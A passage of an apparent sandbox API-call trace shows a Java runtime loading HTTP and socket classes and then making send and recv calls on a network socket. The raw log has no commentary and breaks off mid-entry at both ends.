lpNumberOfBytesRead=0x4bdf48, lpOverlapped=0x0 | out: lpBuffer=0x4bdfb0*, lpNumberOfBytesRead=0x4bdf48*=0x1e, lpOverlapped=0x0) returned 1 [0019.199] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x16f53b5, lpNewFilePointer=0x0, dwMoveMethod=0x4bdfb4 | out: lpNewFilePointer=0x0) returned 1 [0019.199] ReadFile (in: hFile=0xd4, lpBuffer=0x15034e70, nNumberOfBytesToRead=0x752, lpNumberOfBytesRead=0x4bdf84, lpOverlapped=0x0 | out: lpBuffer=0x15034e70*, lpNumberOfBytesRead=0x4bdf84*=0x752, lpOverlapped=0x0) returned 1 [0019.202] setsockopt (s=0x290, level=6, optname=1, optval="\x01", optlen=4) returned 0 [0019.212] strlen (_Str="sun/net/www/protocol/http/AuthenticationInfo.class") returned 0x32 [0019.217] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x3388fa2, lpNewFilePointer=0x0, dwMoveMethod=0x4be8dc | out: lpNewFilePointer=0x0) returned 1 [0019.217] ReadFile (in: hFile=0xd4, lpBuffer=0xacb4a8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be8ac, lpOverlapped=0x0 | out: lpBuffer=0xacb4a8*, lpNumberOfBytesRead=0x4be8ac*=0xa0, lpOverlapped=0x0) returned 1 [0019.217] strlen (_Str="sun/net/www/protocol/http/AuthenticationInfo.class") returned 0x32 [0019.217] strcpy (in: _Dest=0x4be9e0, _Source="sun/net/www/protocol/http/AuthenticationInfo.class" | out: _Dest="sun/net/www/protocol/http/AuthenticationInfo.class") returned="sun/net/www/protocol/http/AuthenticationInfo.class" [0019.217] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x2537df4, lpNewFilePointer=0x0, dwMoveMethod=0x4be4e0 | out: lpNewFilePointer=0x0) returned 1 [0019.218] ReadFile (in: hFile=0xd4, lpBuffer=0x4be518, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be4b0, lpOverlapped=0x0 | out: lpBuffer=0x4be518*, lpNumberOfBytesRead=0x4be4b0*=0x1e, lpOverlapped=0x0) returned 1 [0019.218] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x2537e44, lpNewFilePointer=0x0, dwMoveMethod=0x4be51c | out: lpNewFilePointer=0x0) returned 1 [0019.218] ReadFile (in: hFile=0xd4, lpBuffer=0x15034e70, nNumberOfBytesToRead=0x1c1e, lpNumberOfBytesRead=0x4be4ec, lpOverlapped=0x0 | out: lpBuffer=0x15034e70*, lpNumberOfBytesRead=0x4be4ec*=0x1c1e, lpOverlapped=0x0) returned 1 [0019.219] strlen (_Str="sun/net/www/protocol/http/AuthCacheValue.class") returned 0x2e [0019.219] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x3388e1b, lpNewFilePointer=0x0, dwMoveMethod=0x4be27c | out: lpNewFilePointer=0x0) returned 1 [0019.219] ReadFile (in: hFile=0xd4, lpBuffer=0xacb4a8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be24c, lpOverlapped=0x0 | out: lpBuffer=0xacb4a8*, lpNumberOfBytesRead=0x4be24c*=0xa0, lpOverlapped=0x0) returned 1 [0019.220] strlen (_Str="sun/net/www/protocol/http/AuthCacheValue.class") returned 0x2e [0019.220] strcpy (in: _Dest=0x4be380, _Source="sun/net/www/protocol/http/AuthCacheValue.class" | out: _Dest="sun/net/www/protocol/http/AuthCacheValue.class") returned="sun/net/www/protocol/http/AuthCacheValue.class" [0019.220] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x2536580, lpNewFilePointer=0x0, dwMoveMethod=0x4bde80 | out: lpNewFilePointer=0x0) returned 1 [0019.220] ReadFile (in: hFile=0xd4, lpBuffer=0x4bdeb8, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4bde50, lpOverlapped=0x0 | out: lpBuffer=0x4bdeb8*, lpNumberOfBytesRead=0x4bde50*=0x1e, lpOverlapped=0x0) returned 1 [0019.220] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x25365cc, lpNewFilePointer=0x0, dwMoveMethod=0x4bdebc | out: lpNewFilePointer=0x0) returned 1 [0019.220] ReadFile (in: hFile=0xd4, lpBuffer=0x15036c38, nNumberOfBytesToRead=0x398, lpNumberOfBytesRead=0x4bde8c, lpOverlapped=0x0 | out: lpBuffer=0x15036c38*, lpNumberOfBytesRead=0x4bde8c*=0x398, lpOverlapped=0x0) returned 1 [0019.221] strlen (_Str="sun/net/www/protocol/http/AuthCacheImpl.class") returned 0x2d [0019.221] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x3388d5f, lpNewFilePointer=0x0, dwMoveMethod=0x4be5ac | out: lpNewFilePointer=0x0) returned 1 [0019.221] ReadFile (in: hFile=0xd4, lpBuffer=0xacb4a8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be57c, lpOverlapped=0x0 | out: lpBuffer=0xacb4a8*, lpNumberOfBytesRead=0x4be57c*=0xa0, lpOverlapped=0x0) returned 1 [0019.221] strlen (_Str="sun/net/www/protocol/http/AuthCacheImpl.class") returned 0x2d [0019.221] strcpy (in: _Dest=0x4be6b0, _Source="sun/net/www/protocol/http/AuthCacheImpl.class" | out: _Dest="sun/net/www/protocol/http/AuthCacheImpl.class") returned="sun/net/www/protocol/http/AuthCacheImpl.class" [0019.221] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x253598f, lpNewFilePointer=0x0, dwMoveMethod=0x4be1b0 | out: lpNewFilePointer=0x0) returned 1 [0019.221] ReadFile (in: hFile=0xd4, lpBuffer=0x4be1e8, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be180, lpOverlapped=0x0 | out: lpBuffer=0x4be1e8*, lpNumberOfBytesRead=0x4be180*=0x1e, lpOverlapped=0x0) returned 1 [0019.222] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x25359da, lpNewFilePointer=0x0, dwMoveMethod=0x4be1ec | out: lpNewFilePointer=0x0) returned 1 [0019.222] ReadFile (in: hFile=0xd4, lpBuffer=0x15034e70, nNumberOfBytesToRead=0x790, lpNumberOfBytesRead=0x4be1bc, lpOverlapped=0x0 | out: lpBuffer=0x15034e70*, lpNumberOfBytesRead=0x4be1bc*=0x790, lpOverlapped=0x0) returned 1 [0019.222] strlen (_Str="sun/net/www/protocol/http/AuthCache.class") returned 0x29 [0019.223] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x3388d08, lpNewFilePointer=0x0, dwMoveMethod=0x4bdf08 | out: lpNewFilePointer=0x0) returned 1 [0019.223] ReadFile (in: hFile=0xd4, lpBuffer=0xacb4a8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4bded8, lpOverlapped=0x0 | out: lpBuffer=0xacb4a8*, lpNumberOfBytesRead=0x4bded8*=0xa0, lpOverlapped=0x0) returned 1 [0019.223] strlen (_Str="sun/net/www/protocol/http/AuthCache.class") returned 0x29 [0019.223] strcpy (in: _Dest=0x4be00c, _Source="sun/net/www/protocol/http/AuthCache.class" | out: _Dest="sun/net/www/protocol/http/AuthCache.class") returned="sun/net/www/protocol/http/AuthCache.class" [0019.223] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x253582f, lpNewFilePointer=0x0, dwMoveMethod=0x4bdb0c | out: lpNewFilePointer=0x0) returned 1 [0019.223] ReadFile (in: hFile=0xd4, lpBuffer=0x4bdb44, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4bdadc, lpOverlapped=0x0 | out: lpBuffer=0x4bdb44*, lpNumberOfBytesRead=0x4bdadc*=0x1e, lpOverlapped=0x0) returned 1 [0019.223] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x2535876, lpNewFilePointer=0x0, dwMoveMethod=0x4bdb48 | out: lpNewFilePointer=0x0) returned 1 [0019.223] ReadFile (in: hFile=0xd4, lpBuffer=0x15035798, nNumberOfBytesToRead=0x119, lpNumberOfBytesRead=0x4bdb18, lpOverlapped=0x0 | out: lpBuffer=0x15035798*, lpNumberOfBytesRead=0x4bdb18*=0x119, lpOverlapped=0x0) returned 1 [0019.230] send (in: s=0x290, buf=0x4be8f4*, len=182, flags=0 | out: buf=0x4be8f4*) returned 182 [0019.230] strlen (_Str="java/net/Socket$2.class") returned 0x17 [0019.230] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x32ecbd3, lpNewFilePointer=0x0, dwMoveMethod=0x4bea48 | out: lpNewFilePointer=0x0) returned 1 [0019.230] ReadFile (in: hFile=0xd4, lpBuffer=0xacb4a8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4bea18, lpOverlapped=0x0 | out: lpBuffer=0xacb4a8*, lpNumberOfBytesRead=0x4bea18*=0xa0, lpOverlapped=0x0) returned 1 [0019.230] strlen (_Str="java/net/Socket$2.class") returned 0x17 [0019.231] strcpy (in: _Dest=0x4beb4c, _Source="java/net/Socket$2.class" | out: _Dest="java/net/Socket$2.class") returned="java/net/Socket$2.class" [0019.231] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x16f413f, lpNewFilePointer=0x0, dwMoveMethod=0x4be64c | out: lpNewFilePointer=0x0) returned 1 [0019.231] ReadFile (in: hFile=0xd4, lpBuffer=0x4be684, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be61c, lpOverlapped=0x0 | out: lpBuffer=0x4be684*, lpNumberOfBytesRead=0x4be61c*=0x1e, lpOverlapped=0x0) returned 1 [0019.231] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x16f4174, lpNewFilePointer=0x0, dwMoveMethod=0x4be688 | out: lpNewFilePointer=0x0) returned 1 [0019.231] ReadFile (in: hFile=0xd4, lpBuffer=0x15034e70, nNumberOfBytesToRead=0x2ec, lpNumberOfBytesRead=0x4be658, lpOverlapped=0x0 | out: lpBuffer=0x15034e70*, lpNumberOfBytesRead=0x4be658*=0x2ec, lpOverlapped=0x0) returned 1 [0019.232] strlen (_Str="java/net/SocketInputStream.class") returned 0x20 [0019.232] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x32ecc5d, lpNewFilePointer=0x0, dwMoveMethod=0x4be554 | out: lpNewFilePointer=0x0) returned 1 [0019.232] ReadFile (in: hFile=0xd4, lpBuffer=0xacb4a8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be524, lpOverlapped=0x0 | out: lpBuffer=0xacb4a8*, lpNumberOfBytesRead=0x4be524*=0xa0, lpOverlapped=0x0) returned 1 [0019.232] strlen (_Str="java/net/SocketInputStream.class") returned 0x20 [0019.232] strcpy (in: _Dest=0x4be658, _Source="java/net/SocketInputStream.class" | out: _Dest="java/net/SocketInputStream.class") returned="java/net/SocketInputStream.class" [0019.232] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x16f4784, lpNewFilePointer=0x0, dwMoveMethod=0x4be158 | out: lpNewFilePointer=0x0) returned 1 [0019.232] ReadFile (in: hFile=0xd4, lpBuffer=0x4be190, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be128, lpOverlapped=0x0 | out: lpBuffer=0x4be190*, lpNumberOfBytesRead=0x4be128*=0x1e, lpOverlapped=0x0) returned 1 [0019.232] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x16f47c2, lpNewFilePointer=0x0, dwMoveMethod=0x4be194 | out: lpNewFilePointer=0x0) returned 1 [0019.232] ReadFile (in: hFile=0xd4, lpBuffer=0x15034e70, nNumberOfBytesToRead=0xa85, lpNumberOfBytesRead=0x4be164, lpOverlapped=0x0 | out: lpBuffer=0x15034e70*, lpNumberOfBytesRead=0x4be164*=0xa85, lpOverlapped=0x0) returned 1 [0019.235] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.326] strlen (_Str="sun/net/www/HeaderParser.class") returned 0x1e [0019.326] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x3387e95, lpNewFilePointer=0x0, dwMoveMethod=0x4bea2c | out: lpNewFilePointer=0x0) returned 1 [0019.326] ReadFile (in: hFile=0xd4, lpBuffer=0xacb4a8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be9fc, lpOverlapped=0x0 | out: lpBuffer=0xacb4a8*, lpNumberOfBytesRead=0x4be9fc*=0xa0, lpOverlapped=0x0) returned 1 [0019.326] strlen (_Str="sun/net/www/HeaderParser.class") returned 0x1e [0019.326] strcpy (in: _Dest=0x4beb30, _Source="sun/net/www/HeaderParser.class" | out: _Dest="sun/net/www/HeaderParser.class") returned="sun/net/www/HeaderParser.class" [0019.326] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x2521a40, lpNewFilePointer=0x0, dwMoveMethod=0x4be630 | out: lpNewFilePointer=0x0) returned 1 [0019.326] ReadFile (in: hFile=0xd4, lpBuffer=0x4be668, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be600, lpOverlapped=0x0 | out: lpBuffer=0x4be668*, lpNumberOfBytesRead=0x4be600*=0x1e, lpOverlapped=0x0) returned 1 [0019.327] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x2521a7c, lpNewFilePointer=0x0, dwMoveMethod=0x4be66c | out: lpNewFilePointer=0x0) returned 1 [0019.327] ReadFile (in: hFile=0xd4, lpBuffer=0x15034e70, nNumberOfBytesToRead=0xd33, lpNumberOfBytesRead=0x4be63c, lpOverlapped=0x0 | out: lpBuffer=0x15034e70*, lpNumberOfBytesRead=0x4be63c*=0xd33, lpOverlapped=0x0) returned 1 [0019.332] strlen (_Str="sun/net/www/http/KeepAliveStream.class") returned 0x26 [0019.332] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x338895f, lpNewFilePointer=0x0, dwMoveMethod=0x4bea28 | out: lpNewFilePointer=0x0) returned 1 [0019.332] ReadFile (in: hFile=0xd4, lpBuffer=0xacb4a8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be9f8, lpOverlapped=0x0 | out: lpBuffer=0xacb4a8*, lpNumberOfBytesRead=0x4be9f8*=0xa0, lpOverlapped=0x0) returned 1 [0019.332] strlen (_Str="sun/net/www/http/KeepAliveStream.class") returned 0x26 [0019.332] strcpy (in: _Dest=0x4beb2c, _Source="sun/net/www/http/KeepAliveStream.class" | out: _Dest="sun/net/www/http/KeepAliveStream.class") returned="sun/net/www/http/KeepAliveStream.class" [0019.332] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x25307e7, lpNewFilePointer=0x0, dwMoveMethod=0x4be62c | out: lpNewFilePointer=0x0) returned 1 [0019.332] ReadFile (in: hFile=0xd4, lpBuffer=0x4be664, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be5fc, lpOverlapped=0x0 | out: lpBuffer=0x4be664*, lpNumberOfBytesRead=0x4be5fc*=0x1e, lpOverlapped=0x0) returned 1 [0019.332] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x253082b, lpNewFilePointer=0x0, dwMoveMethod=0x4be668 | out: lpNewFilePointer=0x0) returned 1 [0019.332] ReadFile (in: hFile=0xd4, lpBuffer=0x15034e70, nNumberOfBytesToRead=0xcae, lpNumberOfBytesRead=0x4be638, lpOverlapped=0x0 | out: lpBuffer=0x15034e70*, lpNumberOfBytesRead=0x4be638*=0xcae, lpOverlapped=0x0) returned 1 [0019.339] strlen (_Str="sun/net/www/http/Hurryable.class") returned 0x20 [0019.339] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x3388715, lpNewFilePointer=0x0, dwMoveMethod=0x4be384 | out: lpNewFilePointer=0x0) returned 1 [0019.339] ReadFile (in: hFile=0xd4, lpBuffer=0xacb4a8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be354, lpOverlapped=0x0 | out: lpBuffer=0xacb4a8*, lpNumberOfBytesRead=0x4be354*=0xa0, lpOverlapped=0x0) returned 1 [0019.339] strlen (_Str="sun/net/www/http/Hurryable.class") returned 0x20 [0019.339] strcpy (in: _Dest=0x4be488, _Source="sun/net/www/http/Hurryable.class" | out: _Dest="sun/net/www/http/Hurryable.class") returned="sun/net/www/http/Hurryable.class" [0019.339] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x252e396, lpNewFilePointer=0x0, dwMoveMethod=0x4bdf88 | out: lpNewFilePointer=0x0) returned 1 [0019.339] ReadFile (in: hFile=0xd4, lpBuffer=0x4bdfc0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4bdf58, lpOverlapped=0x0 | out: lpBuffer=0x4bdfc0*, lpNumberOfBytesRead=0x4bdf58*=0x1e, lpOverlapped=0x0) returned 1 [0019.339] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x252e3d4, lpNewFilePointer=0x0, dwMoveMethod=0x4bdfc4 | out: lpNewFilePointer=0x0) returned 1 [0019.340] ReadFile (in: hFile=0xd4, lpBuffer=0x15035ca0, nNumberOfBytesToRead=0x64, lpNumberOfBytesRead=0x4bdf94, lpOverlapped=0x0 | out: lpBuffer=0x15035ca0*, lpNumberOfBytesRead=0x4bdf94*=0x64, lpOverlapped=0x0) returned 1 [0019.340] strlen (_Str="sun/net/www/MeteredStream.class") returned 0x1f [0019.340] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x3387f3d, lpNewFilePointer=0x0, dwMoveMethod=0x4be3c8 | out: lpNewFilePointer=0x0) returned 1 [0019.340] ReadFile (in: hFile=0xd4, lpBuffer=0xacb4a8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be398, lpOverlapped=0x0 | out: lpBuffer=0xacb4a8*, lpNumberOfBytesRead=0x4be398*=0xa0, lpOverlapped=0x0) returned 1 [0019.340] strlen (_Str="sun/net/www/MeteredStream.class") returned 0x1f [0019.340] strcpy (in: _Dest=0x4be4cc, _Source="sun/net/www/MeteredStream.class" | out: _Dest="sun/net/www/MeteredStream.class") returned="sun/net/www/MeteredStream.class" [0019.340] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x2522e28, lpNewFilePointer=0x0, dwMoveMethod=0x4bdfcc | out: lpNewFilePointer=0x0) returned 1 [0019.340] ReadFile (in: hFile=0xd4, lpBuffer=0x4be004, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4bdf9c, lpOverlapped=0x0 | out: lpBuffer=0x4be004*, lpNumberOfBytesRead=0x4bdf9c*=0x1e, lpOverlapped=0x0) returned 1 [0019.341] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x2522e65, lpNewFilePointer=0x0, dwMoveMethod=0x4be008 | out: lpNewFilePointer=0x0) returned 1 [0019.341] ReadFile (in: hFile=0xd4, lpBuffer=0x15035c98, nNumberOfBytesToRead=0x822, lpNumberOfBytesRead=0x4bdfd8, lpOverlapped=0x0 | out: lpBuffer=0x15035c98*, lpNumberOfBytesRead=0x4bdfd8*=0x822, lpOverlapped=0x0) returned 1 [0019.343] strlen (_Str="sun/net/www/http/KeepAliveStreamCleaner.class") returned 0x2d [0019.343] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x3388a6d, lpNewFilePointer=0x0, dwMoveMethod=0x4be78c | out: lpNewFilePointer=0x0) returned 1 [0019.343] ReadFile (in: hFile=0xd4, lpBuffer=0xacb4a8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be75c, lpOverlapped=0x0 | out: lpBuffer=0xacb4a8*, lpNumberOfBytesRead=0x4be75c*=0xa0, lpOverlapped=0x0) returned 1 [0019.343] strlen (_Str="sun/net/www/http/KeepAliveStreamCleaner.class") returned 0x2d [0019.343] strcpy (in: _Dest=0x4be890, _Source="sun/net/www/http/KeepAliveStreamCleaner.class" | out: _Dest="sun/net/www/http/KeepAliveStreamCleaner.class") returned="sun/net/www/http/KeepAliveStreamCleaner.class" [0019.343] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x2531ac7, lpNewFilePointer=0x0, dwMoveMethod=0x4be390 | out: lpNewFilePointer=0x0) returned 1 [0019.343] ReadFile (in: hFile=0xd4, lpBuffer=0x4be3c8, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be360, lpOverlapped=0x0 | out: lpBuffer=0x4be3c8*, lpNumberOfBytesRead=0x4be360*=0x1e, lpOverlapped=0x0) returned 1 [0019.343] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x2531b12, lpNewFilePointer=0x0, dwMoveMethod=0x4be3cc | out: lpNewFilePointer=0x0) returned 1 [0019.343] ReadFile (in: hFile=0xd4, lpBuffer=0x15034e70, nNumberOfBytesToRead=0x8ea, lpNumberOfBytesRead=0x4be39c, lpOverlapped=0x0 | out: lpBuffer=0x15034e70*, lpNumberOfBytesRead=0x4be39c*=0x8ea, lpOverlapped=0x0) returned 1 [0019.344] strlen (_Str="sun/net/www/http/KeepAliveStreamCleaner$1.class") returned 0x2f [0019.345] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x33889b3, lpNewFilePointer=0x0, dwMoveMethod=0x4be4dc | out: lpNewFilePointer=0x0) returned 1 [0019.345] ReadFile (in: hFile=0xd4, lpBuffer=0xacb4a8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be4ac, lpOverlapped=0x0 | out: lpBuffer=0xacb4a8*, lpNumberOfBytesRead=0x4be4ac*=0xa0, lpOverlapped=0x0) returned 1 [0019.345] strlen (_Str="sun/net/www/http/KeepAliveStreamCleaner$1.class") returned 0x2f [0019.345] strcpy (in: _Dest=0x4be5e0, _Source="sun/net/www/http/KeepAliveStreamCleaner$1.class" | out: _Dest="sun/net/www/http/KeepAliveStreamCleaner$1.class") returned="sun/net/www/http/KeepAliveStreamCleaner$1.class" [0019.345] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x25314d9, lpNewFilePointer=0x0, dwMoveMethod=0x4be0e0 | out: lpNewFilePointer=0x0) returned 1 [0019.345] ReadFile (in: hFile=0xd4, lpBuffer=0x4be118, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be0b0, lpOverlapped=0x0 | out: lpBuffer=0x4be118*, lpNumberOfBytesRead=0x4be0b0*=0x1e, lpOverlapped=0x0) returned 1 [0019.345] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x2531526, lpNewFilePointer=0x0, dwMoveMethod=0x4be11c | out: lpNewFilePointer=0x0) returned 1 [0019.345] ReadFile (in: hFile=0xd4, lpBuffer=0x15034e70, nNumberOfBytesToRead=0x2ab, lpNumberOfBytesRead=0x4be0ec, lpOverlapped=0x0 | out: lpBuffer=0x15034e70*, lpNumberOfBytesRead=0x4be0ec*=0x2ab, lpOverlapped=0x0) returned 1 [0019.346] strlen (_Str="sun/net/www/http/KeepAliveStreamCleaner$2.class") returned 0x2f [0019.346] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x3388a10, lpNewFilePointer=0x0, dwMoveMethod=0x4be4dc | out: lpNewFilePointer=0x0) returned 1 [0019.346] ReadFile (in: hFile=0xd4, lpBuffer=0xacb4a8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4be4ac, lpOverlapped=0x0 | out: lpBuffer=0xacb4a8*, lpNumberOfBytesRead=0x4be4ac*=0xa0, lpOverlapped=0x0) returned 1 [0019.347] strlen (_Str="sun/net/www/http/KeepAliveStreamCleaner$2.class") returned 0x2f [0019.347] strcpy (in: _Dest=0x4be5e0, _Source="sun/net/www/http/KeepAliveStreamCleaner$2.class" | out: _Dest="sun/net/www/http/KeepAliveStreamCleaner$2.class") returned="sun/net/www/http/KeepAliveStreamCleaner$2.class" [0019.347] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x25317d1, lpNewFilePointer=0x0, dwMoveMethod=0x4be0e0 | out: lpNewFilePointer=0x0) returned 1 [0019.347] ReadFile (in: hFile=0xd4, lpBuffer=0x4be118, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be0b0, lpOverlapped=0x0 | out: lpBuffer=0x4be118*, lpNumberOfBytesRead=0x4be0b0*=0x1e, lpOverlapped=0x0) returned 1 [0019.347] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x253181e, lpNewFilePointer=0x0, dwMoveMethod=0x4be11c | out: lpNewFilePointer=0x0) returned 1 [0019.347] ReadFile (in: hFile=0xd4, lpBuffer=0x15034e70, nNumberOfBytesToRead=0x2a9, lpNumberOfBytesRead=0x4be0ec, lpOverlapped=0x0 | out: lpBuffer=0x15034e70*, lpNumberOfBytesRead=0x4be0ec*=0x2a9, lpOverlapped=0x0) returned 1 [0019.350] strlen (_Str="sun/net/www/protocol/http/HttpURLConnection$HttpInputStream.class") returned 0x41 [0019.350] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x338980b, lpNewFilePointer=0x0, dwMoveMethod=0x4beab4 | out: lpNewFilePointer=0x0) returned 1 [0019.350] ReadFile (in: hFile=0xd4, lpBuffer=0xacb4a8, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4bea84, lpOverlapped=0x0 | out: lpBuffer=0xacb4a8*, lpNumberOfBytesRead=0x4bea84*=0xa0, lpOverlapped=0x0) returned 1 [0019.350] strlen (_Str="sun/net/www/protocol/http/HttpURLConnection$HttpInputStream.class") returned 0x41 [0019.350] strcpy (in: _Dest=0x4bebb8, _Source="sun/net/www/protocol/http/HttpURLConnection$HttpInputStream.class" | out: _Dest="sun/net/www/protocol/http/HttpURLConnection$HttpInputStream.class") returned="sun/net/www/protocol/http/HttpURLConnection$HttpInputStream.class" [0019.350] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x254208a, lpNewFilePointer=0x0, dwMoveMethod=0x4be6b8 | out: lpNewFilePointer=0x0) returned 1 [0019.350] ReadFile (in: hFile=0xd4, lpBuffer=0x4be6f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4be688, lpOverlapped=0x0 | out: lpBuffer=0x4be6f0*, lpNumberOfBytesRead=0x4be688*=0x1e, lpOverlapped=0x0) returned 1 [0019.351] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x25420e9, lpNewFilePointer=0x0, dwMoveMethod=0x4be6f4 | out: lpNewFilePointer=0x0) returned 1 [0019.351] ReadFile (in: hFile=0xd4, lpBuffer=0x15034e70, nNumberOfBytesToRead=0xa5e, lpNumberOfBytesRead=0x4be6c4, lpOverlapped=0x0 | out: lpBuffer=0x15034e70*, lpNumberOfBytesRead=0x4be6c4*=0xa5e, lpOverlapped=0x0) returned 1 [0019.352] strlen (_Str="java/io/ByteArrayOutputStream") returned 0x1d [0019.353] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.354] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.355] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.355] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.356] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.356] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.358] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.358] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.358] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.359] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.360] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.360] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.361] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.361] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.362] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.362] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.363] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.363] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.365] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.365] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.365] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.366] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.366] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.366] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | out: buf=0x1505f3a0*) returned 8192 [0019.367] ioctlsocket (in: s=0x290, cmd=1074030207, argp=0x4bf184 | out: argp=0x4bf184) returned 0 [0019.367] recv (in: s=0x290, buf=0x1505f3a0, len=8192, flags=0 | 